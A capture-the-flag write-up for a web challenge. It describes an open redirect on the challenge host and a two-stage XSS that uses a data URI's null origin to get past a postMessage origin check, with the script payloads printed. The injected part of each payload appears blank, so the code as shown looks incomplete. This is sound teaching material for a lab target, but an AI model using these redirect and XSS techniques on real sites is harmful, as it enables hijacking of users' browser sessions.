Tags: web xss 

Rating: 0

I spent far too long going in the wrong direction for this task. I found an unintended vulnerability, which I thought was the solution, but this was later patched during the challenge.

### Initial (Unintended) Solution

I found that if you updated your profile information to contain an XSS payload, you could trigger a (self) XSS when visiting the home page. This combined with a CSRF exploit to update the profile information could potentially be used to gain XSS from the admin. However this vulnerability was patched before I could get the flag.

### My Actual Solution

The admin would now only visit pages coming from the challenge host. To get around this an open redirect vulnerability was found as seen below:
`http://51.15.73.163:13337/redirect.php?url=http://myip&h=341cd45197fd184ef27833a1fe316dd9`
Note `h` is the MD5 hash of the `url` value.

This challenge was also exploited using the `window.postMessage` XSS however the page now validated that the request came from the same origin. To exploit this we used a data URI XSS which has a null origin and bypasses the origin validation. This is shown below:

#### Payload Stage 1

The first payload triggers an XSS in the user's browser which then loads another JavaScript payload using the `data:URI`.

```
<script>
var call_window;
call_window = window.open("http://51.15.73.163:13336/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "testuser2",
sender_team_name: "test",
receiver_username:"


aaaaaaa",
receiver_team_name: 'aa'
}
}, "*");
}, 1000);

</script>
```

#### Payload Stage 2

The base64 decoded payload is as follows:

```
<script>var call_window;
call_window = window.open("http://localhost/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "testuser2",
sender_team_name: "test",
receiver_username:"


aaaaaaa",
receiver_team_name: 'aa'
}
}, "*");
}, 1000);</script>
```

bookgin – March 20, 2018, 1:51 a.m.

".. later patched during the challenge"?
Do you mean that they modify this task during the challenge?